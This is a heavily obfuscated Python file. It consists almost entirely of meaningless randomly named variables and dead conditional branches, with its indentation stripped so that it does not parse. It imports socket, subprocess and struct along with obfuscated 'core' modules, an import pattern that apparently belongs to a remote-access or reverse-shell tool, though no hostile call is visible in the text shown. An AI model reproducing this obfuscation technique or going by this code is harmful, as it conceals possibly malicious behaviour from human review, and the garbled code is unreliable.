zmNDzvGHuIEXFHBBtGtCEpxpAQSFvzsESQMwGFYFyGQyEUBBoMCOCFPCRARREmS = zmNDzvGHuIEXFHBBtGtCEpxpAQSFvzsESQMwGFYFyGQyEUBBoMCOCFPCRARREmS
else:
JGVSPRGBFsIFoozrXsVmAuRCtkGmrxAJLHBNJQNXmywOzWCRIqdwHfHAVRNRhcH = FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF
else:
xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg = FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF
FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF = JGVSPRGBFsIFoozrXsVmAuRCtkGmrxAJLHBNJQNXmywOzWCRIqdwHfHAVRNRhcH
if xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg == FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF:
for HRyrqOtsypSnHBzRBSrqSTREnxnZBuDIwHExwJRHOERJMeIAHBxAluyrvEnGyxt in FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF:
if HRyrqOtsypSnHBzRBSrqSTREnxnZBuDIwHExwJRHOERJMeIAHBxAluyrvEnGyxt == xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg:
xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg = FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF
else:
xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg = JGVSPRGBFsIFoozrXsVmAuRCtkGmrxAJLHBNJQNXmywOzWCRIqdwHfHAVRNRhcH
# -*- coding: utf-8 -*-
AyyJNDoAGAIUSBzoEBDRSsBuCQTuqPIbuzzIsQenGzdCJuSRAsvpkjkkHRxNHEJ = 'tpFzvBWpzIwQzkwSGKFyEHBmEHerSCRIDrDDGHAQuRvSzJtMEYIPJHiGLxrVIBF'
GlCHfIBuGpDHwRZBDAJErEJJvuQvCJoqkHqVVetCypAJSvFIRQdEESBEvnFqYxi = 'jPxxzVnpBGycGxGSBtHAPNSRiJCyTgJFuoGRDwjOFZeDAhPuMHtEzAQjnIIHqXj'
if AyyJNDoAGAIUSBzoEBDRSsBuCQTuqPIbuzzIsQenGzdCJuSRAsvpkjkkHRxNHEJ != GlCHfIBuGpDHwRZBDAJErEJJvuQvCJoqkHqVVetCypAJSvFIRQdEESBEvnFqYxi:
AyyJNDoAGAIUSBzoEBDRSsBuCQTuqPIbuzzIsQenGzdCJuSRAsvpkjkkHRxNHEJ = 'jPxxzVnpBGycGxGSBtHAPNSRiJCyTgJFuoGRDwjOFZeDAhPuMHtEzAQjnIIHqXj'
GlCHfIBuGpDHwRZBDAJErEJJvuQvCJoqkHqVVetCypAJSvFIRQdEESBEvnFqYxi = AyyJNDoAGAIUSBzoEBDRSsBuCQTuqPIbuzzIsQenGzdCJuSRAsvpkjkkHRxNHEJ
AyyJNDoAGAIUSBzoEBDRSsBuCQTuqPIbuzzIsQenGzdCJuSRAsvpkjkkHRxNHEJ = 'tpFzvBWpzIwQzkwSGKFyEHBmEHerSCRIDrDDGHAQuRvSzJtMEYIPJHiGLxrVIBF'
import socket
qSHTUIGyrrzAZSuGsyvWJRiuJSlMFiursJPnAIsRRHtCAIpEFpivlUyzPPOIkHC = 'rpIyDHGDZCcJGACzGNUjOjHhzGxzGDSypkrQFFsxBjHJANOnxAHAnDGrECiwFgD'
OJnLJCRyyIqvmzsGqwOymvRASgstGSHytRrxDrDrDwAEHRrpaksBnfQRySIzPzv = 'rEFtxByMzxySSqpGPrHPARJNFXPAHIvBEyxzJWCDSFFFeQYzPRuOJvWRtGOEIkC'
GFYQPqpCIuGDxVuRVEyVPJQxSIPCWzuIRHUGGiSsSflZjOvuySsIyVqxQxoGGWj = 'XDnRxJyrSMiDmmEEQpwcRDzyVMImOCyozwxEFJBHDGnFJHSGxuvrtuPzyIJQFWz'
if qSHTUIGyrrzAZSuGsyvWJRiuJSlMFiursJPnAIsRRHtCAIpEFpivlUyzPPOIkHC == OJnLJCRyyIqvmzsGqwOymvRASgstGSHytRrxDrDrDwAEHRrpaksBnfQRySIzPzv:
GFYQPqpCIuGDxVuRVEyVPJQxSIPCWzuIRHUGGiSsSflZjOvuySsIyVqxQxoGGWj = 'XDnRxJyrSMiDmmEEQpwcRDzyVMImOCyozwxEFJBHDGnFJHSGxuvrtuPzyIJQFWz'
GFYQPqpCIuGDxVuRVEyVPJQxSIPCWzuIRHUGGiSsSflZjOvuySsIyVqxQxoGGWj = qSHTUIGyrrzAZSuGsyvWJRiuJSlMFiursJPnAIsRRHtCAIpEFpivlUyzPPOIkHC
else:
GFYQPqpCIuGDxVuRVEyVPJQxSIPCWzuIRHUGGiSsSflZjOvuySsIyVqxQxoGGWj = 'XDnRxJyrSMiDmmEEQpwcRDzyVMImOCyozwxEFJBHDGnFJHSGxuvrtuPzyIJQFWz'
GFYQPqpCIuGDxVuRVEyVPJQxSIPCWzuIRHUGGiSsSflZjOvuySsIyVqxQxoGGWj = 'rpIyDHGDZCcJGACzGNUjOjHhzGxzGDSypkrQFFsxBjHJANOnxAHAnDGrECiwFgD'
import subprocess
JSzCSDWEJIDymqnQSyOJOzgXouJzPzPGSpRfySPyCeBGPzfJEzQveMtJFuTonMq = 'iwCpAIRHOhOClFOQABQPxSWmBGItrDODGntZwJEtHOJIpXOwxxErCJvPBQupwBw'
uSouClnmuwtgPJZKVJJJDCXRrutOSiQSAwVrCwQqSDkxEkNPmGqQhRJJISnSJxP = 'uvSDQDBGEBFqkyRNnnFRqDGyOSRloHfGRbJxMJwDrPOiuuwWyCAFrICEuDCMYvx'
if JSzCSDWEJIDymqnQSyOJOzgXouJzPzPGSpRfySPyCeBGPzfJEzQveMtJFuTonMq != uSouClnmuwtgPJZKVJJJDCXRrutOSiQSAwVrCwQqSDkxEkNPmGqQhRJJISnSJxP:
JSzCSDWEJIDymqnQSyOJOzgXouJzPzPGSpRfySPyCeBGPzfJEzQveMtJFuTonMq = 'uvSDQDBGEBFqkyRNnnFRqDGyOSRloHfGRbJxMJwDrPOiuuwWyCAFrICEuDCMYvx'
uSouClnmuwtgPJZKVJJJDCXRrutOSiQSAwVrCwQqSDkxEkNPmGqQhRJJISnSJxP = JSzCSDWEJIDymqnQSyOJOzgXouJzPzPGSpRfySPyCeBGPzfJEzQveMtJFuTonMq
JSzCSDWEJIDymqnQSyOJOzgXouJzPzPGSpRfySPyCeBGPzfJEzQveMtJFuTonMq = 'iwCpAIRHOhOClFOQABQPxSWmBGItrDODGntZwJEtHOJIpXOwxxErCJvPBQupwBw'
import struct
JBSLEPRAvQAFRizRBKCEYDppGJSJFHIpHyUIUoxAHIjtXItcSzJAzczwIJqHTts = 'KCtPJwmOCDoTVmwxGQJuYSqnFAHlOStzsByoVuQjPEvFutnAvQDzIPGGIQuESxz'
oiJoINSwBDtLHCAEDHYSHJvGvPPHecAEIEDAjqkqASOyyCHxzGDSSGwHvAxGEQw = 'iwBHjuJQUflzCAkSoRayDPpACdQFbhSQZDLNHJXYImoiGoIIhRYyPBFzXuohBIR'
if JBSLEPRAvQAFRizRBKCEYDppGJSJFHIpHyUIUoxAHIjtXItcSzJAzczwIJqHTts != oiJoINSwBDtLHCAEDHYSHJvGvPPHecAEIEDAjqkqASOyyCHxzGDSSGwHvAxGEQw:
JBSLEPRAvQAFRizRBKCEYDppGJSJFHIpHyUIUoxAHIjtXItcSzJAzczwIJqHTts = 'iwBHjuJQUflzCAkSoRayDPpACdQFbhSQZDLNHJXYImoiGoIIhRYyPBFzXuohBIR'
oiJoINSwBDtLHCAEDHYSHJvGvPPHecAEIEDAjqkqASOyyCHxzGDSSGwHvAxGEQw = JBSLEPRAvQAFRizRBKCEYDppGJSJFHIpHyUIUoxAHIjtXItcSzJAzczwIJqHTts
JBSLEPRAvQAFRizRBKCEYDppGJSJFHIpHyUIUoxAHIjtXItcSzJAzczwIJqHTts = 'KCtPJwmOCDoTVmwxGQJuYSqnFAHlOStzsByoVuQjPEvFutnAvQDzIPGGIQuESxz'
import sys
oqINBvBCuqZIDHFnVsSMPpFEEqAXzNHQPCtwytSUEvkkFboHPBGQrjAGnlOrHuw = 'RRwGSASPTBCzJQruFMNCqfqFaGQfRoluUnMYNmGnOGBSEgnrOvRmRBaStwvRCPi'
GdvXfIsyXwxJuIJSuCEFfXxztCqHDBDIDVjkSTWTXGJDxRRpESlASNsRLOorjRr = 'BFzDqIrFwIEFNqGCSuFBNzmDyrHFHlBGMCEZJzOvkPBqxjVEexyzDzNSOEqcytR'
wsXsrIQHjSeCRsHvFIFnAvvIuzRxOYLFiGUCzoRqDGOgHHGjDZHuGQePrrzRGtZ = 'RrWauTNuuqNFDSlReixvOEErSzQwDtzHgsUyUAqxkBjBUdMrHmAwDvxRQzEfGQN'
if oqINBvBCuqZIDHFnVsSMPpFEEqAXzNHQPCtwytSUEvkkFboHPBGQrjAGnlOrHuw == GdvXfIsyXwxJuIJSuCEFfXxztCqHDBDIDVjkSTWTXGJDxRRpESlASNsRLOorjRr:
wsXsrIQHjSeCRsHvFIFnAvvIuzRxOYLFiGUCzoRqDGOgHHGjDZHuGQePrrzRGtZ = 'RrWauTNuuqNFDSlReixvOEErSzQwDtzHgsUyUAqxkBjBUdMrHmAwDvxRQzEfGQN'
wsXsrIQHjSeCRsHvFIFnAvvIuzRxOYLFiGUCzoRqDGOgHHGjDZHuGQePrrzRGtZ = oqINBvBCuqZIDHFnVsSMPpFEEqAXzNHQPCtwytSUEvkkFboHPBGQrjAGnlOrHuw
else:
wsXsrIQHjSeCRsHvFIFnAvvIuzRxOYLFiGUCzoRqDGOgHHGjDZHuGQePrrzRGtZ = 'RrWauTNuuqNFDSlReixvOEErSzQwDtzHgsUyUAqxkBjBUdMrHmAwDvxRQzEfGQN'
wsXsrIQHjSeCRsHvFIFnAvvIuzRxOYLFiGUCzoRqDGOgHHGjDZHuGQePrrzRGtZ = 'RRwGSASPTBCzJQruFMNCqfqFaGQfRoluUnMYNmGnOGBSEgnrOvRmRBaStwvRCPi'
try:
uEESCwtPySzsERHPvJxvtIRNgVMytIPCJuWJHPADINRQHHwzYFIHzAPyIyBmEqJ = 'AxmxiumQAFHGgWRTPNOOCWSpzJHPSFtzPJRFnnPoMZERgJCluuIvyyEmRFGJoBP'
vRVMhtvCPyzPCJDOzTqQyHyFNXBGGoPYrAyNitCwCSfwkBSkDQCxnBvzDRpJYJn = 'sFByRmIuUpJDewYrbvHxnJIsEWCJEwRJCFIvHeqCzwezLECJqepuowzhuIvNSCu'
if uEESCwtPySzsERHPvJxvtIRNgVMytIPCJuWJHPADINRQHHwzYFIHzAPyIyBmEqJ != vRVMhtvCPyzPCJDOzTqQyHyFNXBGGoPYrAyNitCwCSfwkBSkDQCxnBvzDRpJYJn:
uEESCwtPySzsERHPvJxvtIRNgVMytIPCJuWJHPADINRQHHwzYFIHzAPyIyBmEqJ = 'sFByRmIuUpJDewYrbvHxnJIsEWCJEwRJCFIvHeqCzwezLECJqepuowzhuIvNSCu'
vRVMhtvCPyzPCJDOzTqQyHyFNXBGGoPYrAyNitCwCSfwkBSkDQCxnBvzDRpJYJn = uEESCwtPySzsERHPvJxvtIRNgVMytIPCJuWJHPADINRQHHwzYFIHzAPyIyBmEqJ
uEESCwtPySzsERHPvJxvtIRNgVMytIPCJuWJHPADINRQHHwzYFIHzAPyIyBmEqJ = 'AxmxiumQAFHGgWRTPNOOCWSpzJHPSFtzPJRFnnPoMZERgJCluuIvyyEmRFGJoBP'
from core.mlRSHnORJEINxGsriAJHTYHTPRECHHXCEJyGqrsOxjXFuEYyCypFDxmBgyzHeeR import uSIByGHznHHkkvwwPIVnIDFmmvPIHMRIyINSxzREPRIJQsuHBAIBMOtBQvIltFA, SPuftCNRrBmEOHCGpJsNAREOsyuxkCNDSBrSxGriSZOARHCTADxEyFHFPgOgFtg, vtMRvNIZLQjyJnDNOMACSDDwRCSJsDWOiDOCIESrasNPSuqDRsJHTwoEvItFRqw
CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH = 'DXFYzLoSNrnpOIHygzGHvQxDUmRwCAfuFRHCpnoHCzDGBGJDSRJJGMItQFePIvd'
RPuXtRSMDSrklwCrDwHQyzqwiJHytDMAtBRCFGCpCEnOuCtoHYlbOSAEAJzhVhF = 'cxIEAGnVCYFEpCztxNhVwuwyTYCArNpuzAxvppCQIxECPJJSSozNRIrlORyYFxE'
EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf = 'tSIUjAARBvfnIdruXHANvSJRgteCDICAYGIIePByDHRDOzhkFCNpeGRDJyOiUCB'
pGPkNzMBHykwZqEEFBgIFysFjTuqySGroEMxNHDHQAAuzCgCSDAsJCstJSIoSmz = 'qGjSzLmgyoqsERyIREfXlqBeGPTHZQHgSySySRGDmNyLpIHDPYOmQSuPEIBCzpw'
JZWsPIIgkJwPhAZJQCWHSdCsJFzpQxpPBIlHkQIPJZAxqDSwzwIRZkFGZszxFDS = 'JMPjSiPGFEoBSIQFsiJYMRBSdGxpGUAFhFSyBAuRCErFyDItFBFOhESIEPNPJm'
QXkyOFRuQFrIGHvGBQIzJSQthCuGIxFZxsvGvJGHYmyAuDqAWAIQhNPPOZQyADD = 'JEEqpDtqMJGMFzNISmGVBFSTlyXSDIOMWGQEHIRuNQsPIfoJhsORFwpzRGYnHws'
if CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH != pGPkNzMBHykwZqEEFBgIFysFjTuqySGroEMxNHDHQAAuzCgCSDAsJCstJSIoSmz:
RPuXtRSMDSrklwCrDwHQyzqwiJHytDMAtBRCFGCpCEnOuCtoHYlbOSAEAJzhVhF = EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf
for QXkyOFRuQFrIGHvGBQIzJSQthCuGIxFZxsvGvJGHYmyAuDqAWAIQhNPPOZQyADD in pGPkNzMBHykwZqEEFBgIFysFjTuqySGroEMxNHDHQAAuzCgCSDAsJCstJSIoSmz:
if QXkyOFRuQFrIGHvGBQIzJSQthCuGIxFZxsvGvJGHYmyAuDqAWAIQhNPPOZQyADD != EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf:
RPuXtRSMDSrklwCrDwHQyzqwiJHytDMAtBRCFGCpCEnOuCtoHYlbOSAEAJzhVhF = RPuXtRSMDSrklwCrDwHQyzqwiJHytDMAtBRCFGCpCEnOuCtoHYlbOSAEAJzhVhF
else:
JZWsPIIgkJwPhAZJQCWHSdCsJFzpQxpPBIlHkQIPJZAxqDSwzwIRZkFGZszxFDS = CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH
else:
EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf = CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH
CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH = JZWsPIIgkJwPhAZJQCWHSdCsJFzpQxpPBIlHkQIPJZAxqDSwzwIRZkFGZszxFDS
if EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf == CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH:
for QXkyOFRuQFrIGHvGBQIzJSQthCuGIxFZxsvGvJGHYmyAuDqAWAIQhNPPOZQyADD in CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH:
if QXkyOFRuQFrIGHvGBQIzJSQthCuGIxFZxsvGvJGHYmyAuDqAWAIQhNPPOZQyADD == EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf:
EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf = CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH
else:
EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf = JZWsPIIgkJwPhAZJQCWHSdCsJFzpQxpPBIlHkQIPJZAxqDSwzwIRZkFGZszxFDS
from core.GDBuGjtzDtAHlDJHwyDFJHNFQRIzdBRqORcFFxozwRRvCDdBHFDPIFSjpTysrjO import vIRwVSrRIoGDyAzHuoJjtNEGPQATAHFuAoCIjSvXYCAHcDGzOHiuVDIDtwoJGpy, kyvylzQylABvsJoPANuHBJzJofEFAOEIIiJpCEDRxoQNolMqHtFCHxSyBSrFSCC
try:
CvxCCiGFDyGRCOvjFJgXRoIFSJujyDlzpUEtYlgsyHIjRDpnkPHykeXzPsmUyG = 'DnQxrAWDuGnETunGOyqRePnHIyoISMxNBuVYEYJAHADXtIFvIOAnuntFMSdhwHw'
LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv = 'GFBCoZBzQWRzGJAZHrqRSDtXLUSuAvrtnrJGBZzwIAvrPryfWHGDHSXtVDwxpoE'
PAPSPmADIpzpvAwjRxDBnHPICnxQzjHQuFbgQSzHxmNyYGPmGLwIzEMQtFmjSXB = 'HORmRESSBFAoIpvuDgDwJWImDSCHSGmOTGvsIlyRBzCwFCgZPuPSDwoHjRPNrGy'
IJvzRrSRlCGoHDCvRACTJRoSrnYPFPVICiyzIxHJknxrPQouDJWyRneSIqGsBrR = 'jYBPkZBwSJlOTPUdRGhUJoEjEHHHJxuOzTHwuNTTxRmHsFoxBmnrOtJuuCPGYt'
psHblWwExvuJKJKqeuMpUSKpufHIHHzzBSrDBCMzFNUjYLUVuPkDEPMwQjGDQCR = 'JqEwTQmvptDCJTAtqAtqzMufBuAREFuFIBqpvuIvFArwLBIAuSrDpQQuiyLJBJt'
ExrrtXQmJnHEuAUSJPjFJfSyoRGGSRWyGExyKRIPuJuuBFCsVIHHUEQRgIRGOzE = 'vSjqPGJzXuFxPECGAAuxIivVryxzmNxzsQGttPODSzROIJXByPXDwDGIPkDGzGo'
AjRJAJMHzKxkUHQuBxQISHDsYyMSvOFBcEQjoxqAEGtmmyCsFEBlEMADyBviGxD = [
'DnQxrAWDuGnETunGOyqRePnHIyoISMxNBuVYEYJAHADXtIFvIOAnuntFMSdhwHw',
'HORmRESSBFAoIpvuDgDwJWImDSCHSGmOTGvsIlyRBzCwFCgZPuPSDwoHjRPNrGy',
'JqEwTQmvptDCJTAtqAtqzMufBuAREFuFIBqpvuIvFArwLBIAuSrDpQQuiyLJBJt',
'FFySBiaROmFYyHMGFkNTPgRPHkxYJSEpwkYjiIBEtAZrFIQvEAvhjxQFBDSJRMl'
]
for CvxCCiGFDyGRCOvjFJgXRoIFSJujyDlzpUEtYlgsyHIjRDpnkPHykeXzPsmUyG in ExrrtXQmJnHEuAUSJPjFJfSyoRGGSRWyGExyKRIPuJuuBFCsVIHHUEQRgIRGOzE:
for LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv in PAPSPmADIpzpvAwjRxDBnHPICnxQzjHQuFbgQSzHxmNyYGPmGLwIzEMQtFmjSXB:
if IJvzRrSRlCGoHDCvRACTJRoSrnYPFPVICiyzIxHJknxrPQouDJWyRneSIqGsBrR == psHblWwExvuJKJKqeuMpUSKpufHIHHzzBSrDBCMzFNUjYLUVuPkDEPMwQjGDQCR:
LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv = CvxCCiGFDyGRCOvjFJgXRoIFSJujyDlzpUEtYlgsyHIjRDpnkPHykeXzPsmUyG
elif psHblWwExvuJKJKqeuMpUSKpufHIHHzzBSrDBCMzFNUjYLUVuPkDEPMwQjGDQCR == LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv:
LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv = ExrrtXQmJnHEuAUSJPjFJfSyoRGGSRWyGExyKRIPuJuuBFCsVIHHUEQRgIRGOzE
else:
psHblWwExvuJKJKqeuMpUSKpufHIHHzzBSrDBCMzFNUjYLUVuPkDEPMwQjGDQCR = ExrrtXQmJnHEuAUSJPjFJfSyoRGGSRWyGExyKRIPuJuuBFCsVIHHUEQRgIRGOzE
for LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv in AjRJAJMHzKxkUHQuBxQISHDsYyMSvOFBcEQjoxqAEGtmmyCsFEBlEMADyBviGxD:
PAPSPmADIpzpvAwjRxDBnHPICnxQzjHQuFbgQSzHxmNyYGPmGLwIzEMQtFmjSXB = LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv
except Exception:
pass
from core.GEnMoqyyUuvxIDthAUEBVJIqDBEBXGAIHQeiUjsBHwSGDFHmysGkCyGRwQClFDE import GuHDlyvuyMYuBAOtBAoPLYEGnaoPxOQUqfGYkfnEGXzwIHOCMmuuwFjwmqQQFVu
CuPCCFSPRNErJQytGjGoCDsCyQCXwAvxoEtGDJzIQslAAwwJSAQwHBOERZRsjyt = 'mcBwPHgEzoQYEQGzAIDDNGuzGzujRQSJQASoRrmOwQDAxBWqkwFwEmSkCHnDknC'
hlHRIBjmtrDRADIDzPvJFCFhIiDASyCRCwAOqtytMAOBRSvyzqCfBIXuAIjWzsw = 'KBSliMqNRECCTNQsGOxkFnGtyIZTsxeToJMHhSBRPIPpZWERmRNppSSRYIIvqt'
if CuPCCFSPRNErJQytGjGoCDsCyQCXwAvxoEtGDJzIQslAAwwJSAQwHBOERZRsjyt != hlHRIBjmtrDRADIDzPvJFCFhIiDASyCRCwAOqtytMAOBRSvyzqCfBIXuAIjWzsw:
CuPCCFSPRNErJQytGjGoCDsCyQCXwAvxoEtGDJzIQslAAwwJSAQwHBOERZRsjyt = 'KBSliMqNRECCTNQsGOxkFnGtyIZTsxeToJMHhSBRPIPpZWERmRNppSSRYIIvqt'
hlHRIBjmtrDRADIDzPvJFCFhIiDASyCRCwAOqtytMAOBRSvyzqCfBIXuAIjWzsw = CuPCCFSPRNErJQytGjGoCDsCyQCXwAvxoEtGDJzIQslAAwwJSAQwHBOERZRsjyt
CuPCCFSPRNErJQytGjGoCDsCyQCXwAvxoEtGDJzIQslAAwwJSAQwHBOERZRsjyt = 'mcBwPHgEzoQYEQGzAIDDNGuzGzujRQSJQASoRrmOwQDAxBWqkwFwEmSkCHnDknC'
from core.xMPjIiIPERPCuRrUryvQHyYqqrRGnXzziqxujxkWElGFIQBpyPhzJCPRRQIHQw import HCEwqSIvzuVuOsqtHkJSBDxBGyvADGEjjJGIDlvrESExqlHvSQSszJEkDPJGOBQ
nyOxEJxDBPQJwMGiHzMDTwszQGFAFuJDmBGuSOJPQizGrJvHJGPoxIwCPGuIDji = 'IPGzINsnUSQMFwPIPpHeDazBsuRiRMWouOtSeeyySTrvIsRUtHiQYBGrIZkPrBx'
zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE = 'BuvJRRKHUyHIxIxDGQvRpJCwnRRpItCbAsetFYIvvYsJIBzUAvHMIynnqDOGDRF'
FGyqEbELuzvTeFztxwDvwmDPtBpmBtDGGIRtGrBRBSEoSBJGNOECVItIOytyQfH = 'ArszGIACFSzvXmMHJQCPuHFyFCOTSFBZzHCkhjCNQEHMqDjyQoJaxSGxCHCCGlS'
HTEQmsDDCtyDxCuCAISEUHGpFzIDwSqOesfAEtzysVgBpJEMFpCDqHGkwnBwxB = 'kIlxMyOGZHTzgfyvSHBFqIsVIzJBjrAFEPITyIqZIZDoERTEjwTvFICBSBHGASP'
xHpizJHFQvvTJRQTSJPQxSHDGCtOJSvISsmPnFzYvGHHKNSIvsqSrRCSQotmkMN = 'yFayRNgJgvOHtzRFFSpFsGePwxMCGjJISQWDCrHERPhuwSWJCQJDZvMwAsPruHv'
if nyOxEJxDBPQJwMGiHzMDTwszQGFAFuJDmBGuSOJPQizGrJvHJGPoxIwCPGuIDji in zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE:
nyOxEJxDBPQJwMGiHzMDTwszQGFAFuJDmBGuSOJPQizGrJvHJGPoxIwCPGuIDji = xHpizJHFQvvTJRQTSJPQxSHDGCtOJSvISsmPnFzYvGHHKNSIvsqSrRCSQotmkMN
if zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE in FGyqEbELuzvTeFztxwDvwmDPtBpmBtDGGIRtGrBRBSEoSBJGNOECVItIOytyQfH:
zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE = HTEQmsDDCtyDxCuCAISEUHGpFzIDwSqOesfAEtzysVgBpJEMFpCDqHGkwnBwxB
elif zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE in nyOxEJxDBPQJwMGiHzMDTwszQGFAFuJDmBGuSOJPQizGrJvHJGPoxIwCPGuIDji:
FGyqEbELuzvTeFztxwDvwmDPtBpmBtDGGIRtGrBRBSEoSBJGNOECVItIOytyQfH = zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE
if FGyqEbELuzvTeFztxwDvwmDPtBpmBtDGGIRtGrBRBSEoSBJGNOECVItIOytyQfH in zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE:
zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE = xHpizJHFQvvTJRQTSJPQxSHDGCtOJSvISsmPnFzYvGHHKNSIvsqSrRCSQotmkMN
from core.GUHQyNzYwxRHRrtOBrXpxJsOZwCyrSGeJTPwVlAmmpwxqPIASTSRPRISEGtuyIP import GuHDlyvuyMYuBAOtBAoPLYEGnaoPxOQUqfGYkfnEGXzwIHOCMmuuwFjwmqQQFVu
IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw = 'UQsvBxSGqyPtYoEHCNmCJcaePvOCHPkMJvHEztSJguuJIIuXJwOhBYHCUCRZwSl'
SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI = 'xCzFNtvvRYiqwfDAtwvmSElAOtJCoFSETpGMIHEJrWPiJCOCtIuSOEJHgoCmrIv'
DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL = 'CDkozkqNQAymGCEzzQSwvSHPQwOItyDUIHDewZsvIZwCDzGDYgtmIMJjsAqvHEf'
GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx = 'YPynqCIeRqPCCRCmuxoCrAnYBmEHsBBuHFOSSJHrQYvrrCzQJtevGRQCEIFOzBn'
if SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI == IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw:
for IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw in SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
if SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI == SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL = 'GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx'
elif DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL == GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx:
GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx = IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw
else:
